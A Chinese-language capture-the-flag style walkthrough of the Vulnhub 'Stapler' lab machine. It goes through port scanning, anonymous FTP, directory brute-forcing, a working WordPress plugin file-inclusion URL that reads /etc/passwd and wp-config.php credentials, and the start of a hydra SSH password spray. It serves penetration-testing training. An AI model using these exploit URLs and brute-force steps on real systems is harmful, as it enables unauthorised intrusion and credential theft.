Vulnhub-stapler靶场渗透

目标发现

由于是在同一网络下的靶机,那么可以使用arp-scan进行扫描发现目标:

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    00:50:56:c0:00:08       (Unknown)
192.168.56.2    00:50:56:fa:da:39       (Unknown)
192.168.56.134  00:0c:29:72:d7:b4       (Unknown)
192.168.56.254  00:50:56:e6:5b:75       (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.861 seconds (137.56 hosts/sec). 4 responded

从扫描结果来看目标应该是192.168.56.134,下面就需要进行资产搜集,查找开放的端口以及相关服务识别。

信息搜集

可以通过fscan或者nmap进行搜集。

开放端口信息

开放端口识别:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -p- 192.168.56.134 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-01 16:12 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00066s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:72:D7:B4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.54 seconds

开放端口服务识别:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p20,21,22,53,80,123,137,138,139,666,3306,12380,2 -A 192.168.56.134 --min-rate=10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-01 16:15 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00077s latency).

PORT      STATE    SERVICE     VERSION
2/tcp     filtered compressnet
20/tcp    closed   ftp-data
21/tcp    open     ftp         vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp    open     ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open     domain      dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open     http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed   ntp
137/tcp   closed   netbios-ns
138/tcp   closed   netbios-dgm
139/tcp   open     netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open     pkzip-file  .ZIP file
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open     mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 9
|   Capabilities flags: 63487
|   Some Capabilities: ConnectWithDatabase, IgnoreSigpipes, Speaks41ProtocolOld, InteractiveClient, LongPassword, DontAllowDatabaseTableColumn, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, FoundRows, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: *\x01E\x04\x11\x15QC}\x7F\x1F\x02o\x19: ;1f>
|_  Auth Plugin Name: mysql_native_password
12380/tcp open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.95%I=7%D=5/1%Time=69F509D5%P=x86_64-pc-linux-gnu%r(NULL
SF:,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15
SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04
SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2
SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x
SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb
SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\
SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3
SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0
SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8
SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf
SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd
SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5
SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf
SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\
SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x
SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x
SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\
SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x
SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x
SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x
SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\
SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x
SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\
SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[
SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc
SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7
SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x
SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96
SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\
SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\
SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x
SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc
SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\
SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x
SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf
SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?
SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 00:0C:29:72:D7:B4 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/1%OT=21%CT=20%CU=37001%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=69F50A0C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%TS=8
OS:)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%T
OS:S=8)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=105%GCD=1%ISR=10D%TI=
OS:Z%CI=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST1
OS:1NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7
OS:120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:N)

Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2026-05-02T05:13:47+01:00
| smb2-time:
|   date: 2026-05-02T04:13:47
|_  start_date: N/A
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 7h38m07s, deviation: 34m37s, median: 7h58m06s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.56.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.79 seconds

信息汇总:

通过上面的两个方面的信息搜集,可以得到下面的信息:

端口 服务 版本 关键信息
21 FTP vsftpd 3.0.3 允许匿名登录(Anonymous FTP login allowed)
22 SSH OpenSSH 7.2p2 Ubuntu 4,可尝试爆破或已知漏洞
53 DNS dnsmasq 2.75 DNS 服务
80 HTTP PHP cli server 5.5+ 返回 404,PHP 内置开发服务器
139 Samba smbd 4.3.9-Ubuntu 消息签名已禁用,GUEST 账户
666 自定义 .ZIP 文件服务 返回一个包含 message2.jpg 的 ZIP 文件
3306 MySQL 5.7.12-0ubuntu1 mysql_native_password 认证
12380 HTTP Apache 2.4.18 存在可访问的web服务

FTP服务(21)

前面的扫描结果发现可以匿名登录,那么可以尝试登录进行信息搜集。

┌──(kali㉿kali)-[~/Work/stepler]
└─$ sudo ftp 192.168.56.134                                         Connected to 192.168.56.134.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.56.134:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% |***********************|   107        7.61 KiB/s    00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (6.21 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Work/stepler]
└─$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

可以看到存在一个note文件,里面没有什么有效信息,除了两个人名,可以保存用于后续密码喷洒等。

自定义服务(666)

根据扫描结果发现目标在666端口开放了一个自定义服务,存在一个.ZIP文件,通过nc可以访问:

image-20260502220326284

使用nc将其下载:

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ nc 192.168.56.134 666 > 666

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ ls
666

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ file 666                                                        
666: Zip archive data, made by v3.0 UNIX, extract using at least v2.0, last modified Jun 03 2016 16:03:08, uncompressed size 12821, method=deflate

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ mv 666 666.zip

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ unzip 666.zip
Archive:  666.zip
  inflating: message2.jpg

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ ll
总计 28
-rw-rw-r-- 1 kali kali 11608  5月 2日 10:03 666.zip
-rw-r--r-- 1 kali kali 12821 2016年 6月 3日 message2.jpg

可以看到解压后释放了一个图片文件,查看是否存在隐写字符串:

┌──(kali㉿kali)-[~/Work/stepler/666]
└─$ strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
<Elu
I[[k:>
>5[^k
;o{o
>xgH
mCXi
PE<R"
umcV
g[Y@=
[\Y_
\Oku
'X|(
?=?i
//Do
1okb
,>,&
n<;oc
*?      xC
~ |y
6{M6

看来不存在什么有效信息,直接查看图片:

image-20260502220955046

也没有什么有效信息,依然只有一个人名:Scott

web服务(80,12380)

存在两个web服务,可以逐个访问和目录扫描:

port-80

直接访问没有任何有效信息:

image-20260502221745215

通过目录扫描得到了几个文件:

┌──(kali㉿kali)-[~/Work/stepler]
└─$ dirsearch -u "http://192.168.56.134"

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/reports/http_192.168.56.134/_26-05-02_10-19-16.txt

Target: http://192.168.56.134/

[10:19:16] Starting:
[10:19:17] 200 -  220B  - /.bash_logout
[10:19:17] 200 -    4KB - /.bashrc
[10:19:21] 200 -  675B  - /.profile

Task Completed

全部下载进行访问,但并没有任何有效信息。

port-12380

直接访问目标:

image-20260502222948616

没有任何有效信息,抓包查看响应:

image-20260502224504980

可以看到有一个不正常的返回头信息,并提示400,可能是请求协议有问题,而且无法通过目录扫描得到信息:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ dirsearch -u http://192.168.56.134:12380

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/http_192.168.56.134_12380/_26-05-02_10-38-18.txt

Target: http://192.168.56.134:12380/

[10:38:18] Starting:

Task Completed

尝试变更协议为https访问:

image-20260502224920129

可以看到访问正常了,尝试目录扫描和服务识别:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ dirsearch -u https://192.168.56.134:12380 -x 403

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/https_192.168.56.134_12380/_26-05-02_10-50-36.txt

Target: https://192.168.56.134:12380/

[10:50:36] Starting:
[10:51:08] 301 -  331B  - /javascript  ->  https://192.168.56.134:12380/javascript/
[10:51:16] 301 -  331B  - /phpmyadmin  ->  https://192.168.56.134:12380/phpmyadmin/
[10:51:16] 200 -    3KB - /phpmyadmin/
[10:51:16] 200 -    3KB - /phpmyadmin/doc/html/index.html
[10:51:17] 200 -    3KB - /phpmyadmin/index.php
[10:51:20] 200 -   59B  - /robots.txt

Task Completed

可以看到得到了蛮多目录,可以尝试访问:

/phpmyadmin访问是数据库的web管理端登录界面,目前没有密码暂时搁置。

/robots.txt得到了两个新的目录:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ curl https://192.168.56.134:12380/robots.txt -k
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

PS:需要注意的是由于目标是私用证书/证书过期,因此需要使用-k去避免证书校验,否则无法访问。

第一个目录访问弹了一个xss,通过curl访问提示关闭js:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ curl https://192.168.56.134:12380/admin112233/ -k
<html>
<head>
<title>mwwhahahah</title>
<body>
<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
<script type="text/javascript">window.alert("This could of been a BeEF-XSS hook ;)");window.location="http://www.xss-payloads.com/";</script>
</body>
</html>

关闭js后访问没有任何有效信息:

image-20260502230559765

第二个目录进入到了一个博客页:

image-20260502225640103

可以看到服务识别为wordpress,可以继续进行目录爆破也可以通过wordpress专用漏洞识别工具wpscan进行漏洞识别:

目录爆破:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ sudo dirsearch -u https://192.168.56.134:12380/blogblog/ -x 403

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/Work/stepler/12380/reports/https_192.168.56.134_12380/_blogblog__26-05-02_11-29-08.txt

Target: https://192.168.56.134:12380/

[11:29:08] Starting: blogblog/
[11:29:47] 301 -    0B  - /blogblog/index.php  ->  https://192.168.56.134:12380/blogblog/
[11:29:47] 301 -    0B  - /blogblog/index.php/login/  ->  https://192.168.56.134:12380/blogblog/login/
[11:29:49] 200 -    7KB - /blogblog/license.txt
[11:30:01] 200 -    3KB - /blogblog/readme.html
[11:30:14] 301 -  338B  - /blogblog/wp-admin  ->  https://192.168.56.134:12380/blogblog/wp-admin/
[11:30:14] 200 -    1B  - /blogblog/wp-admin/admin-ajax.php
[11:30:14] 200 -    0B  - /blogblog/wp-config.php
[11:30:14] 500 -    3KB - /blogblog/wp-admin/setup-config.php
[11:30:14] 302 -    0B  - /blogblog/wp-admin/  ->  https://192.168.56.134:12380/blogblog/wp-login.php?redirect_to=https%3A%2F%2F192.168.56.134%3A12380%2Fblogblog%2Fwp-admin%2F&reauth=1
[11:30:14] 200 -  605B  - /blogblog/wp-admin/install.php
[11:30:14] 301 -  340B  - /blogblog/wp-content  ->  https://192.168.56.134:12380/blogblog/wp-content/
[11:30:14] 200 -  500B  - /blogblog/wp-content/
[11:30:14] 500 -    0B  - /blogblog/wp-content/plugins/hello.php
[11:30:14] 200 -  426B  - /blogblog/wp-content/uploads/
[11:30:14] 301 -  341B  - /blogblog/wp-includes  ->  https://192.168.56.134:12380/blogblog/wp-includes/
[11:30:14] 500 -    0B  - /blogblog/wp-includes/rss-functions.php
[11:30:14] 200 -    0B  - /blogblog/wp-cron.php
[11:30:14] 200 -    2KB - /blogblog/wp-includes/
[11:30:14] 200 -    1KB - /blogblog/wp-login.php
[11:30:14] 302 -    0B  - /blogblog/wp-signup.php  ->  https://192.168.56.134:12380/blogblog/wp-login.php?action=register
[11:30:15] 405 -   42B  - /blogblog/xmlrpc.php

Task Completed

在/readme.html得到了版本信息4.2.1:

image-20260502233231491

配置文件/blogblog/wp-config.php为空,猜测是没有权限读取。

wordpress的内容目录(/blogblog/wp-content/),里面有三个子目录(插件、主题、上传):

image-20260502233837847

upload目录中没有任何文件:

image-20260502234145421

可以看看插件目录中的插件是否有已知漏洞:

image-20260502233901368

通过search查找已知漏洞发现了一个本地文件包含:

image-20260502234227046

将其下载(searchsploit -m id)后可以看到给出了poc:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

可以直接通过python2运行脚本或者url手动触发,这里由于目标的自用证书导致证书验证错误,原脚本需要进行修改,这里直接使用手动触发:

https://192.168.56.134:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd

访问后给出了一个链接:

image-20260502235647587

但访问无有效内容:

image-20260502235723383

经过查询后发现该漏洞是将读取的文件命名为图片保存至 /wp-content/uploads/ 目录中:

image-20260503000221051

如果包含不存在的文件,那么会报错:

image-20260503000328246

将读取的密码文件下载并读取:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ wget https://192.168.56.134:12380/blogblog/wp-content/uploads/540471516.jpeg --no-check-certificate
--2026-05-02 12:04:09--  https://192.168.56.134:12380/blogblog/wp-content/uploads/540471516.jpeg
正在连接 192.168.56.1:10808... 已连接。
警告: “192.168.56.134” 的证书不可信。
警告: “192.168.56.134” 的证书颁发者未知。
证书所有者与主机名 “192.168.56.134” 不符
已发出 Proxy 请求,正在等待回应... 200 OK
长度:2908 (2.8K) [image/jpeg]
正在保存至: “540471516.jpeg”

540471516.jpeg                           100%[===============================================================================>]   2.84K  --.-KB/s  用时 0s

2026-05-02 12:04:09 (21.9 MB/s) - 已保存 “540471516.jpeg” [2908/2908])


┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat 540471516.jpeg
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash

PS:需要注意的是正如前文所述目标使用自用证书,需要禁止证书校验才能访问,因此wget也要添加相关参数

可以看到读取到了所有用户的密码文件,得到了大量用户,将拥有bash的真实用户提取并保存便于后续可能的利用:

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat 540471516.jpeg |grep bash | awk -F: '{print $1}' >> ../name.txt

┌──(kali㉿kali)-[~/Work/stepler/12380]
└─$ cat ../name.txt
Elly
John
scott
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly

尝试读取配置文件/blogblog/wp-config.php:

https://192.168.56.134:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

image-20260503001519398

成功访问,将其下载查看内容是否存在敏感信息:

...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
...

里面存在目标的数据库账户密码:root:plbkac

那么现在有两个方向:

  • 根据前面搜集的信息,目标开放了3306,且存在web管理端,可以通过mysql进行提权和rce;
  • 使用得到的数据库凭据和前面搜集的用户名进行密码喷洒攻击,尝试登录ssh。

密码喷洒

通过hydra进行密码喷洒攻击:

┌──(kali㉿kali)-[~/Work/stepler]
└─$ hydra -L name.txt -P pass.txt 192.168.56.134 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-02 12:32:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 23 login tries (l:23/p:1), ~2 tries per task
[DATA] attacking ssh://192.168.56.134:22/
